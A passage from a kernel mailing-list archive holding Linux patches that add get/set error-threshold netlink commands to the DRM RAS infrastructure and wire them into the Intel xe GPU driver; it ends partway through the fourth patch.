while at it, consolidate error handling using goto.

Fixes: c36218dc49f5 ("drm/ras: Introduce the DRM RAS infrastructure over generic netlink")
Signed-off-by: Raag Jadav <raag.jadav@intel.com>
Reviewed-by: Riana Tauro <riana.tauro@intel.com>
---
v2: Use goto (Riana)
---
 drivers/gpu/drm/drm_ras.c | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/drivers/gpu/drm/drm_ras.c b/drivers/gpu/drm/drm_ras.c
index d6eab29a1394..467a169026fc 100644
--- a/drivers/gpu/drm/drm_ras.c
+++ b/drivers/gpu/drm/drm_ras.c
@@ -201,25 +201,28 @@ static int doit_reply_value(struct genl_info *info, u32 node_id,
 
 	hdr = genlmsg_iput(msg, info);
 	if (!hdr) {
-		nlmsg_free(msg);
-		return -EMSGSIZE;
+		ret = -EMSGSIZE;
+		goto free_msg;
 	}
 
 	ret = get_node_error_counter(node_id, error_id,
 				     &error_name, &value);
 	if (ret)
-		return ret;
+		goto cancel_msg;
 
 	ret = msg_reply_value(msg, error_id, error_name, value);
-	if (ret) {
-		genlmsg_cancel(msg, hdr);
-		nlmsg_free(msg);
-		return ret;
-	}
+	if (ret)
+		goto cancel_msg;
 
 	genlmsg_end(msg, hdr);
 
 	return genlmsg_reply(msg, info);
+
+cancel_msg:
+	genlmsg_cancel(msg, hdr);
+free_msg:
+	nlmsg_free(msg);
+	return ret;
 }
 
 /**
-- 
2.43.0


^ permalink raw reply related

* [PATCH v4 2/5] drm/ras: Introduce error threshold
From: Raag Jadav @ 2026-06-23 10:09 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: simona.vetter, airlied, kuba, lijo.lazar, Hawking.Zhang, davem,
	pabeni, edumazet, dev, zachary.mckevitt, rodrigo.vivi,
	riana.tauro, michal.wajdeczko, matthew.d.roper, mallesh.koujalagi,
	Raag Jadav
In-Reply-To: <20260623101043.255897-1-raag.jadav@intel.com>

Add get-error-threshold and set-error-threshold command support which
allows querying/setting error threshold of the counter. Threshold in RAS
context means the number of errors the hardware is expected to accumulate
before it raises them to software. This is to have a fine grained control
over error notifications that are raised by the hardware.

Signed-off-by: Raag Jadav <raag.jadav@intel.com>
---
v2: Document threshold definition (Riana)
    Return -EOPNOTSUPP on threshold callbacks absence (Riana)
    Cancel and free genlmsg on failure (Riana)
    Document threshold bounds checking responsibility (Riana)
v3: Move documentation from yaml to rst file (Riana)
    s/value/threshold (Riana)
    Use goto for error handling (Riana)
v4: Clarify 0 threshold expectations (Riana)
    Drop redundant wrapping (Riana)
---
 Documentation/gpu/drm-ras.rst            |  18 +++
 Documentation/netlink/specs/drm_ras.yaml |  32 +++++
 drivers/gpu/drm/drm_ras.c                | 161 +++++++++++++++++++++++
 drivers/gpu/drm/drm_ras_nl.c             |  27 ++++
 drivers/gpu/drm/drm_ras_nl.h             |   4 +
 include/drm/drm_ras.h                    |  28 ++++
 include/uapi/drm/drm_ras.h               |   3 +
 7 files changed, 273 insertions(+)

diff --git a/Documentation/gpu/drm-ras.rst b/Documentation/gpu/drm-ras.rst
index 83c21853b74b..2718f8aee09d 100644
--- a/Documentation/gpu/drm-ras.rst
+++ b/Documentation/gpu/drm-ras.rst
@@ -56,6 +56,10 @@ User space tools can:
   ``node-id`` and ``error-id`` as parameters.
 * Clear specific error counters with the ``clear-error-counter`` command, using both
   ``node-id`` and ``error-id`` as parameters.
+* Query specific error counter threshold with the ``get-error-threshold`` command, using both
+  ``node-id`` and ``error-id`` as parameters.
+* Set specific error counter threshold with the ``set-error-threshold`` command, using
+  ``node-id``, ``error-id`` and ``error-threshold`` as parameters.
 
 YAML-based Interface
 --------------------
@@ -111,3 +115,17 @@ Example: Clear an error counter for a given node
 
     sudo ynl --family drm_ras --do clear-error-counter --json '{"node-id":0, "error-id":1}'
     None
+
+Example: Query error threshold of a given counter
+
+.. code-block:: bash
+
+    sudo ynl --family drm_ras --do get-error-threshold --json '{"node-id":0, "error-id":1}'
+    {'error-id': 1, 'error-name': 'error_name1', 'error-threshold': 16}
+
+Example: Set error threshold of a given counter
+
+.. code-block:: bash
+
+    sudo ynl --family drm_ras --do set-error-threshold --json '{"node-id":0, "error-id":1, "error-threshold":8}'
+    None
diff --git a/Documentation/netlink/specs/drm_ras.yaml b/Documentation/netlink/specs/drm_ras.yaml
index e113056f8c01..9cf7f9cde242 100644
--- a/Documentation/netlink/specs/drm_ras.yaml
+++ b/Documentation/netlink/specs/drm_ras.yaml
@@ -69,6 +69,10 @@ attribute-sets:
         name: error-value
         type: u32
         doc: Current value of the requested error counter.
+      -
+        name: error-threshold
+        type: u32
+        doc: Error threshold of the counter.
 
 operations:
   list:
@@ -124,3 +128,31 @@ operations:
       do:
         request:
           attributes: *id-attrs
+    -
+      name: get-error-threshold
+      doc: >-
+           Retrieve error threshold of a given counter.
+           The response includes the id, the name, and current threshold
+           of the counter.
+      attribute-set: error-counter-attrs
+      flags: [admin-perm]
+      do:
+        request:
+          attributes: *id-attrs
+        reply:
+          attributes:
+            - error-id
+            - error-name
+            - error-threshold
+    -
+      name: set-error-threshold
+      doc: >-
+           Set error threshold of a given counter.
+      attribute-set: error-counter-attrs
+      flags: [admin-perm]
+      do:
+        request:
+          attributes:
+            - node-id
+            - error-id
+            - error-threshold
diff --git a/drivers/gpu/drm/drm_ras.c b/drivers/gpu/drm/drm_ras.c
index 467a169026fc..d60c40ac5427 100644
--- a/drivers/gpu/drm/drm_ras.c
+++ b/drivers/gpu/drm/drm_ras.c
@@ -41,6 +41,13 @@
  *    Userspace must provide Node ID, Error ID.
  *    Clears specific error counter of a node if supported.
  *
+ * 4. GET_ERROR_THRESHOLD: Query error threshold of a given counter.
+ *    Userspace must provide Node ID and Error ID.
+ *    Returns the error threshold of a specific counter.
+ *
+ * 5. SET_ERROR_THRESHOLD: Set error threshold of a given counter.
+ *    Userspace must provide Node ID, Error ID and threshold to be set.
+ *
  * Node registration:
  *
  * - drm_ras_node_register(): Registers a new node and assigns
@@ -61,6 +68,16 @@
  *     + The error counters in the driver doesn't need to be contiguous, but the
  *       driver must return -ENOENT to the query_error_counter as an indication
  *       that the ID should be skipped and not listed in the netlink API.
+ *     + The driver can optionally implement query_error_threshold() and
+ *       set_error_threshold() callbacks to facilitate getting/setting error
+ *       threshold of the counter. Threshold in RAS context means the number of
+ *       errors the hardware is expected to accumulate before it raises them to
+ *       software. This is to have a fine grained control over error notifications
+ *       that are raised by the hardware.
+ *     + The driver is responsible for error threshold bounds checking.
+ *     + Threshold of 0 can mean invalid threshold or act as a disable notifications
+ *       toggle for that counter depending on usecase and the driver is responsible
+ *       for handling it as needed.
  *
  * Netlink handlers:
  *
@@ -72,6 +89,10 @@
  *   operation, fetching a counter value from a specific node.
  * - drm_ras_nl_clear_error_counter_doit(): Implements the CLEAR_ERROR_COUNTER doit
  *   operation, clearing a counter value from a specific node.
+ * - drm_ras_nl_get_error_threshold_doit(): Implements the GET_ERROR_THRESHOLD doit
+ *   operation, fetching the error threshold of a specific counter.
+ * - drm_ras_nl_set_error_threshold_doit(): Implements the SET_ERROR_THRESHOLD doit
+ *   operation, setting the error threshold of a specific counter.
  */
 
 static DEFINE_XARRAY_ALLOC(drm_ras_xa);
@@ -168,6 +189,40 @@ static int get_node_error_counter(u32 node_id, u32 error_id,
 	return node->query_error_counter(node, error_id, name, value);
 }
 
+static int get_node_error_threshold(u32 node_id, u32 error_id, const char **name, u32 *threshold)
+{
+	struct drm_ras_node *node;
+
+	node = xa_load(&drm_ras_xa, node_id);
+	if (!node)
+		return -ENOENT;
+
+	if (!node->query_error_threshold)
+		return -EOPNOTSUPP;
+
+	if (error_id < node->error_counter_range.first || error_id > node->error_counter_range.last)
+		return -EINVAL;
+
+	return node->query_error_threshold(node, error_id, name, threshold);
+}
+
+static int set_node_error_threshold(u32 node_id, u32 error_id, u32 threshold)
+{
+	struct drm_ras_node *node;
+
+	node = xa_load(&drm_ras_xa, node_id);
+	if (!node)
+		return -ENOENT;
+
+	if (!node->set_error_threshold)
+		return -EOPNOTSUPP;
+
+	if (error_id < node->error_counter_range.first || error_id > node->error_counter_range.last)
+		return -EINVAL;
+
+	return node->set_error_threshold(node, error_id, threshold);
+}
+
 static int msg_reply_value(struct sk_buff *msg, u32 error_id,
 			   const char *error_name, u32 value)
 {
@@ -186,6 +241,22 @@ static int msg_reply_value(struct sk_buff *msg, u32 error_id,
 			   value);
 }
 
+static int msg_reply_threshold(struct sk_buff *msg, u32 error_id, const char *error_name,
+			       u32 threshold)
+{
+	int ret;
+
+	ret = nla_put_u32(msg, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID, error_id);
+	if (ret)
+		return ret;
+
+	ret = nla_put_string(msg, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_NAME, error_name);
+	if (ret)
+		return ret;
+
+	return nla_put_u32(msg, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_THRESHOLD, threshold);
+}
+
 static int doit_reply_value(struct genl_info *info, u32 node_id,
 			    u32 error_id)
 {
@@ -225,6 +296,43 @@ static int doit_reply_value(struct genl_info *info, u32 node_id,
 	return ret;
 }
 
+static int doit_reply_threshold(struct genl_info *info, u32 node_id, u32 error_id)
+{
+	const char *error_name;
+	struct sk_buff *msg;
+	struct nlattr *hdr;
+	u32 threshold;
+	int ret;
+
+	msg = genlmsg_new(NLMSG_GOODSIZE, GFP_KERNEL);
+	if (!msg)
+		return -ENOMEM;
+
+	hdr = genlmsg_iput(msg, info);
+	if (!hdr) {
+		ret = -EMSGSIZE;
+		goto free_msg;
+	}
+
+	ret = get_node_error_threshold(node_id, error_id, &error_name, &threshold);
+	if (ret)
+		goto cancel_msg;
+
+	ret = msg_reply_threshold(msg, error_id, error_name, threshold);
+	if (ret)
+		goto cancel_msg;
+
+	genlmsg_end(msg, hdr);
+
+	return genlmsg_reply(msg, info);
+
+cancel_msg:
+	genlmsg_cancel(msg, hdr);
+free_msg:
+	nlmsg_free(msg);
+	return ret;
+}
+
 /**
  * drm_ras_nl_get_error_counter_dumpit() - Dump all Error Counters
  * @skb: Netlink message buffer
@@ -358,6 +466,59 @@ int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
 	return node->clear_error_counter(node, error_id);
 }
 
+/**
+ * drm_ras_nl_get_error_threshold_doit() - Query error threshold of a counter
+ * @skb: Netlink message buffer
+ * @info: Generic Netlink info containing attributes of the request
+ *
+ * Extracts the Node ID and Error ID from the netlink attributes and retrieves
+ * the error threshold of the corresponding counter. Sends the result back to
+ * the requesting user via the standard Genl reply.
+ *
+ * Return: 0 on success, or negative errno on failure.
+ */
+int drm_ras_nl_get_error_threshold_doit(struct sk_buff *skb, struct genl_info *info)
+{
+	u32 node_id, error_id;
+
+	if (!info->attrs ||
+	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID) ||
+	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID))
+		return -EINVAL;
+
+	node_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID]);
+	error_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID]);
+
+	return doit_reply_threshold(info, node_id, error_id);
+}
+
+/**
+ * drm_ras_nl_set_error_threshold_doit() - Set error threshold of a counter
+ * @skb: Netlink message buffer
+ * @info: Generic Netlink info containing attributes of the request
+ *
+ * Extracts the Node ID, Error ID and threshold from the netlink attributes and
+ * sets the error threshold of the corresponding counter.
+ *
+ * Return: 0 on success, or negative errno on failure.
+ */
+int drm_ras_nl_set_error_threshold_doit(struct sk_buff *skb, struct genl_info *info)
+{
+	u32 node_id, error_id, threshold;
+
+	if (!info->attrs ||
+	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID) ||
+	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID) ||
+	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_THRESHOLD))
+		return -EINVAL;
+
+	node_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID]);
+	error_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID]);
+	threshold = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_THRESHOLD]);
+
+	return set_node_error_threshold(node_id, error_id, threshold);
+}
+
 /**
  * drm_ras_node_register() - Register a new RAS node
  * @node: Node structure to register
diff --git a/drivers/gpu/drm/drm_ras_nl.c b/drivers/gpu/drm/drm_ras_nl.c
index dea1c1b2494e..02e8e5054d05 100644
--- a/drivers/gpu/drm/drm_ras_nl.c
+++ b/drivers/gpu/drm/drm_ras_nl.c
@@ -28,6 +28,19 @@ static const struct nla_policy drm_ras_clear_error_counter_nl_policy[DRM_RAS_A_E
 	[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID] = { .type = NLA_U32, },
 };
 
+/* DRM_RAS_CMD_GET_ERROR_THRESHOLD - do */
+static const struct nla_policy drm_ras_get_error_threshold_nl_policy[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID + 1] = {
+	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
+	[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID] = { .type = NLA_U32, },
+};
+
+/* DRM_RAS_CMD_SET_ERROR_THRESHOLD - do */
+static const struct nla_policy drm_ras_set_error_threshold_nl_policy[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_THRESHOLD + 1] = {
+	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
+	[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID] = { .type = NLA_U32, },
+	[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_THRESHOLD] = { .type = NLA_U32, },
+};
+
 /* Ops table for drm_ras */
 static const struct genl_split_ops drm_ras_nl_ops[] = {
 	{
@@ -56,6 +69,20 @@ static const struct genl_split_ops drm_ras_nl_ops[] = {
 		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID,
 		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DO,
 	},
+	{
+		.cmd		= DRM_RAS_CMD_GET_ERROR_THRESHOLD,
+		.doit		= drm_ras_nl_get_error_threshold_doit,
+		.policy		= drm_ras_get_error_threshold_nl_policy,
+		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID,
+		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DO,
+	},
+	{
+		.cmd		= DRM_RAS_CMD_SET_ERROR_THRESHOLD,
+		.doit		= drm_ras_nl_set_error_threshold_doit,
+		.policy		= drm_ras_set_error_threshold_nl_policy,
+		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_THRESHOLD,
+		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DO,
+	},
 };
 
 struct genl_family drm_ras_nl_family __ro_after_init = {
diff --git a/drivers/gpu/drm/drm_ras_nl.h b/drivers/gpu/drm/drm_ras_nl.h
index a398643572a5..57b1e647d833 100644
--- a/drivers/gpu/drm/drm_ras_nl.h
+++ b/drivers/gpu/drm/drm_ras_nl.h
@@ -20,6 +20,10 @@ int drm_ras_nl_get_error_counter_dumpit(struct sk_buff *skb,
 					struct netlink_callback *cb);
 int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
 					struct genl_info *info);
+int drm_ras_nl_get_error_threshold_doit(struct sk_buff *skb,
+					struct genl_info *info);
+int drm_ras_nl_set_error_threshold_doit(struct sk_buff *skb,
+					struct genl_info *info);
 
 extern struct genl_family drm_ras_nl_family;
 
diff --git a/include/drm/drm_ras.h b/include/drm/drm_ras.h
index f2a787bc4f64..683a3844f84f 100644
--- a/include/drm/drm_ras.h
+++ b/include/drm/drm_ras.h
@@ -69,6 +69,34 @@ struct drm_ras_node {
 	 */
 	int (*clear_error_counter)(struct drm_ras_node *node, u32 error_id);
 
+	/**
+	 * @query_error_threshold:
+	 *
+	 * This callback is used by drm-ras to query error threshold of a
+	 * specific counter.
+	 *
+	 * Driver should expect query_error_threshold() to be called with
+	 * error_id from `error_counter_range.first` to
+	 * `error_counter_range.last`.
+	 *
+	 * Returns: 0 on success, negative error code on failure.
+	 */
+	int (*query_error_threshold)(struct drm_ras_node *node, u32 error_id, const char **name,
+				     u32 *threshold);
+	/**
+	 * @set_error_threshold:
+	 *
+	 * This callback is used by drm-ras to set error threshold of a specific
+	 * counter.
+	 *
+	 * Driver should expect set_error_threshold() to be called with error_id
+	 * from `error_counter_range.first` to `error_counter_range.last`.
+	 * Driver is responsible for error threshold bounds checking.
+	 *
+	 * Returns: 0 on success, negative error code on failure.
+	 */
+	int (*set_error_threshold)(struct drm_ras_node *node, u32 error_id, u32 threshold);
+
 	/** @priv: Driver private data */
 	void *priv;
 };
diff --git a/include/uapi/drm/drm_ras.h b/include/uapi/drm/drm_ras.h
index 218a3ee86805..27c68956495f 100644
--- a/include/uapi/drm/drm_ras.h
+++ b/include/uapi/drm/drm_ras.h
@@ -33,6 +33,7 @@ enum {
 	DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID,
 	DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_NAME,
 	DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_VALUE,
+	DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_THRESHOLD,
 
 	__DRM_RAS_A_ERROR_COUNTER_ATTRS_MAX,
 	DRM_RAS_A_ERROR_COUNTER_ATTRS_MAX = (__DRM_RAS_A_ERROR_COUNTER_ATTRS_MAX - 1)
@@ -42,6 +43,8 @@ enum {
 	DRM_RAS_CMD_LIST_NODES = 1,
 	DRM_RAS_CMD_GET_ERROR_COUNTER,
 	DRM_RAS_CMD_CLEAR_ERROR_COUNTER,
+	DRM_RAS_CMD_GET_ERROR_THRESHOLD,
+	DRM_RAS_CMD_SET_ERROR_THRESHOLD,
 
 	__DRM_RAS_CMD_MAX,
 	DRM_RAS_CMD_MAX = (__DRM_RAS_CMD_MAX - 1)
-- 
2.43.0


^ permalink raw reply related

* [PATCH v4 3/5] drm/xe/ras: Add support for error threshold
From: Raag Jadav @ 2026-06-23 10:09 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: simona.vetter, airlied, kuba, lijo.lazar, Hawking.Zhang, davem,
	pabeni, edumazet, dev, zachary.mckevitt, rodrigo.vivi,
	riana.tauro, michal.wajdeczko, matthew.d.roper, mallesh.koujalagi,
	Raag Jadav
In-Reply-To: <20260623101043.255897-1-raag.jadav@intel.com>

System controller allows getting/setting per counter threshold for
correctable errors, which it uses to raise error events to the driver.
Get/set it using the respective mailbox command.

Signed-off-by: Raag Jadav <raag.jadav@intel.com>
---
v2: Add RAS operation status codes (Riana)
v3: Reuse status codes and uapi mapping from counter series (Riana)
    Access request/response counter using local pointer (Riana)
    Mark unused field as reserved (Riana)
v4: Make debug logs consistent (Riana)
    Update kdoc (Riana)
---
 drivers/gpu/drm/xe/xe_ras.c                   | 105 ++++++++++++++++++
 drivers/gpu/drm/xe/xe_ras.h                   |   2 +
 drivers/gpu/drm/xe/xe_ras_types.h             |  51 +++++++++
 drivers/gpu/drm/xe/xe_sysctrl_mailbox_types.h |   4 +
 4 files changed, 162 insertions(+)

diff --git a/drivers/gpu/drm/xe/xe_ras.c b/drivers/gpu/drm/xe/xe_ras.c
index 44f4e1a3455b..afee8202d24e 100644
--- a/drivers/gpu/drm/xe/xe_ras.c
+++ b/drivers/gpu/drm/xe/xe_ras.c
@@ -270,6 +270,111 @@ int xe_ras_clear_counter(struct xe_device *xe, u8 severity, u8 component)
 	return 0;
 }
 
+/**
+ * xe_ras_get_threshold() - Get error counter threshold
+ * @xe: Xe device instance
+ * @severity: Error severity to be queried (&enum drm_xe_ras_error_severity)
+ * @component: Error component to be queried (&enum drm_xe_ras_error_component)
+ * @threshold: Counter threshold
+ *
+ * This function retrieves the error threshold of a specific counter based on
+ * severity and component.
+ *
+ * Return: 0 on success, negative error code on failure.
+ */
+int xe_ras_get_threshold(struct xe_device *xe, u8 severity, u8 component, u32 *threshold)
+{
+	struct xe_ras_get_threshold_response response = {};
+	struct xe_ras_get_threshold_request request = {};
+	struct xe_sysctrl_mailbox_command command = {};
+	struct xe_ras_error_class *counter;
+	size_t len;
+	int ret;
+
+	counter = &request.counter;
+	counter->common.severity = drm_to_xe_ras_severity(severity);
+	counter->common.component = drm_to_xe_ras_component(component);
+
+	xe_sysctrl_create_command(&command, XE_SYSCTRL_GROUP_GFSP, XE_SYSCTRL_CMD_GET_THRESHOLD,
+				  &request, sizeof(request), &response, sizeof(response));
+
+	guard(xe_pm_runtime)(xe);
+	ret = xe_sysctrl_send_command(&xe->sc, &command, &len);
+	if (ret) {
+		xe_err(xe, "sysctrl: failed to get threshold %d\n", ret);
+		return ret;
+	}
+
+	if (len != sizeof(response)) {
+		xe_err(xe, "sysctrl: unexpected get threshold response length %zu (expected %zu)\n",
+		       len, sizeof(response));
+		return -EIO;
+	}
+
+	counter = &response.counter;
+	*threshold = response.threshold;
+
+	xe_dbg(xe, "[RAS]: get threshold %u for %s %s\n", *threshold,
+	       comp_to_str(counter->common.component), sev_to_str(counter->common.severity));
+	return 0;
+}
+
+/**
+ * xe_ras_set_threshold() - Set error counter threshold
+ * @xe: Xe device instance
+ * @severity: Error severity to be set (&enum drm_xe_ras_error_severity)
+ * @component: Error component to be set (&enum drm_xe_ras_error_component)
+ * @threshold: Counter threshold
+ *
+ * This function sets the error threshold of a specific counter based on
+ * severity and component.
+ *
+ * Return: 0 on success, negative error code on failure.
+ */
+int xe_ras_set_threshold(struct xe_device *xe, u8 severity, u8 component, u32 threshold)
+{
+	struct xe_ras_set_threshold_response response = {};
+	struct xe_ras_set_threshold_request request = {};
+	struct xe_sysctrl_mailbox_command command = {};
+	struct xe_ras_error_class *counter;
+	size_t len;
+	int ret;
+
+	counter = &request.counter;
+	counter->common.severity = drm_to_xe_ras_severity(severity);
+	counter->common.component = drm_to_xe_ras_component(component);
+	request.threshold = threshold;
+
+	xe_sysctrl_create_command(&command, XE_SYSCTRL_GROUP_GFSP, XE_SYSCTRL_CMD_SET_THRESHOLD,
+				  &request, sizeof(request), &response, sizeof(response));
+
+	guard(xe_pm_runtime)(xe);
+	ret = xe_sysctrl_send_command(&xe->sc, &command, &len);
+	if (ret) {
+		xe_err(xe, "sysctrl: failed to set threshold %d\n", ret);
+		return ret;
+	}
+
+	if (len != sizeof(response)) {
+		xe_err(xe, "sysctrl: unexpected set threshold response length %zu (expected %zu)\n",
+		       len, sizeof(response));
+		return -EIO;
+	}
+
+	ret = ras_status_to_errno(response.status);
+	if (ret) {
+		xe_err(xe, "sysctrl: set threshold command failed with status %#x\n",
+		       response.status);
+		return ret;
+	}
+
+	counter = &response.counter;
+
+	xe_dbg(xe, "[RAS]: set threshold %u for %s %s\n", response.threshold,
+	       comp_to_str(counter->common.component), sev_to_str(counter->common.severity));
+	return 0;
+}
+
 /**
  * xe_ras_init - Initialize Xe RAS
  * @xe: xe device instance
diff --git a/drivers/gpu/drm/xe/xe_ras.h b/drivers/gpu/drm/xe/xe_ras.h
index ba0b0224df23..1aa43c54b710 100644
--- a/drivers/gpu/drm/xe/xe_ras.h
+++ b/drivers/gpu/drm/xe/xe_ras.h
@@ -15,6 +15,8 @@ void xe_ras_counter_threshold_crossed(struct xe_device *xe,
 				      struct xe_sysctrl_event_response *response);
 int xe_ras_get_counter(struct xe_device *xe, u8 severity, u8 component, u32 *value);
 int xe_ras_clear_counter(struct xe_device *xe, u8 severity, u8 component);
+int xe_ras_get_threshold(struct xe_device *xe, u8 severity, u8 component, u32 *threshold);
+int xe_ras_set_threshold(struct xe_device *xe, u8 severity, u8 component, u32 threshold);
 void xe_ras_init(struct xe_device *xe);
 
 #endif
diff --git a/drivers/gpu/drm/xe/xe_ras_types.h b/drivers/gpu/drm/xe/xe_ras_types.h
index 6688e11f57a8..747b651880cd 100644
--- a/drivers/gpu/drm/xe/xe_ras_types.h
+++ b/drivers/gpu/drm/xe/xe_ras_types.h
@@ -121,4 +121,55 @@ struct xe_ras_clear_counter_response {
 	/** @reserved1: Reserved for future use */
 	u32 reserved1[3];
 } __packed;
+
+/**
+ * struct xe_ras_get_threshold_request - Request structure for get threshold
+ */
+struct xe_ras_get_threshold_request {
+	/** @counter: Counter to get threshold for */
+	struct xe_ras_error_class counter;
+	/** @reserved: Reserved for future use */
+	u32 reserved;
+} __packed;
+
+/**
+ * struct xe_ras_get_threshold_response - Response structure for get threshold
+ */
+struct xe_ras_get_threshold_response {
+	/** @counter: Counter ID */
+	struct xe_ras_error_class counter;
+	/** @threshold: Current threshold of the counter */
+	u32 threshold;
+	/** @reserved: Reserved for future use */
+	u32 reserved[4];
+} __packed;
+
+/**
+ * struct xe_ras_set_threshold_request - Request structure for set threshold
+ */
+struct xe_ras_set_threshold_request {
+	/** @counter: Counter to set threshold for */
+	struct xe_ras_error_class counter;
+	/** @threshold: Threshold to be set */
+	u32 threshold;
+	/** @reserved: Reserved for future use */
+	u32 reserved;
+} __packed;
+
+/**
+ * struct xe_ras_set_threshold_response - Response structure for set threshold
+ */
+struct xe_ras_set_threshold_response {
+	/** @counter: Counter ID */
+	struct xe_ras_error_class counter;
+	/** @reserved: Reserved */
+	u32 reserved;
+	/** @threshold: Updated threshold */
+	u32 threshold;
+	/** @status: Operation status */
+	u32 status;
+	/** @reserved1: Reserved for future use */
+	u32 reserved1[2];
+} __packed;
+
 #endif
diff --git a/drivers/gpu/drm/xe/xe_sysctrl_mailbox_types.h b/drivers/gpu/drm/xe/xe_sysctrl_mailbox_types.h
index 6e3753554510..10f06aa5c4b5 100644
--- a/drivers/gpu/drm/xe/xe_sysctrl_mailbox_types.h
+++ b/drivers/gpu/drm/xe/xe_sysctrl_mailbox_types.h
@@ -24,11 +24,15 @@ enum xe_sysctrl_group {
  *
  * @XE_SYSCTRL_CMD_GET_COUNTER: Get error counter value
  * @XE_SYSCTRL_CMD_CLEAR_COUNTER: Clear error counter value
+ * @XE_SYSCTRL_CMD_GET_THRESHOLD: Retrieve error threshold
+ * @XE_SYSCTRL_CMD_SET_THRESHOLD: Set error threshold
  * @XE_SYSCTRL_CMD_GET_PENDING_EVENT: Retrieve pending event
  */
 enum xe_sysctrl_gfsp_cmd {
 	XE_SYSCTRL_CMD_GET_COUNTER		= 0x03,
 	XE_SYSCTRL_CMD_CLEAR_COUNTER		= 0x04,
+	XE_SYSCTRL_CMD_GET_THRESHOLD		= 0x05,
+	XE_SYSCTRL_CMD_SET_THRESHOLD		= 0x06,
 	XE_SYSCTRL_CMD_GET_PENDING_EVENT	= 0x07,
 };
 
-- 
2.43.0


^ permalink raw reply related

* [PATCH v4 4/5] drm/xe/drm_ras: Wire up error threshold callbacks
From: Raag Jadav @ 2026-06-23 10:09 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: simona.vetter, airlied, kuba, lijo.lazar, Hawking.Zhang, davem,
	pabeni, edumazet, dev, zachary.mckevitt, rodrigo.vivi,
	riana.tauro, michal.wajdeczko, matthew.d.roper, mallesh.koujalagi,
	Raag Jadav
In-Reply-To: <20260623101043.255897-1-raag.jadav@intel.com>

Now that we have get/set error threshold support in xe driver, wire them
up to drm_ras so that userspace can make use of the functionality.

$ sudo ynl --family drm_ras --do get-error-threshold \
--json '{"node-id":0, "error-id":2}'
{'error-id': 2, 'error-name': 'soc-internal', 'error-threshold': 16}

$ sudo ynl --family drm_ras --do set-error-threshold \
--json '{"node-id":0, "error-id":2, "error-threshold":8}'
None

Signed-off-by: Raag Jadav <raag.jadav@intel.com>
Reviewed-by: Riana Tauro <riana.tauro@intel.com>
---
v3: Return -ENOENT on info absence (Riana)
---
 drivers/gpu/drm/xe/xe_drm_ras.c | 34 +++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)

diff --git a/drivers/gpu/drm/xe/xe_drm_ras.c b/drivers/gpu/drm/xe/xe_drm_ras.c
index 7937d8ba0ed9..4afa2ad98300 100644
--- a/drivers/gpu/drm/xe/xe_drm_ras.c
+++ b/drivers/gpu/drm/xe/xe_drm_ras.c
@@ -86,6 +86,38 @@ static int clear_correctable_error_counter(struct drm_ras_node *node, u32 error_
 	return clear_error_counter(xe, DRM_XE_RAS_ERR_SEV_CORRECTABLE, error_id);
 }
 
+static int query_correctable_error_threshold(struct drm_ras_node *ep, u32 error_id,
+					     const char **name, u32 *threshold)
+{
+	struct xe_device *xe = ep->priv;
+	struct xe_drm_ras *ras = &xe->ras;
+	struct xe_drm_ras_counter *info = ras->info[DRM_XE_RAS_ERR_SEV_CORRECTABLE];
+
+	if (!info || !info[error_id].name)
+		return -ENOENT;
+
+	if (!xe->info.has_sysctrl)
+		return -EOPNOTSUPP;
+
+	*name = info[error_id].name;
+	return xe_ras_get_threshold(xe, DRM_XE_RAS_ERR_SEV_CORRECTABLE, error_id, threshold);
+}
+
+static int set_correctable_error_threshold(struct drm_ras_node *ep, u32 error_id, u32 threshold)
+{
+	struct xe_device *xe = ep->priv;
+	struct xe_drm_ras *ras = &xe->ras;
+	struct xe_drm_ras_counter *info = ras->info[DRM_XE_RAS_ERR_SEV_CORRECTABLE];
+
+	if (!info || !info[error_id].name)
+		return -ENOENT;
+
+	if (!xe->info.has_sysctrl)
+		return -EOPNOTSUPP;
+
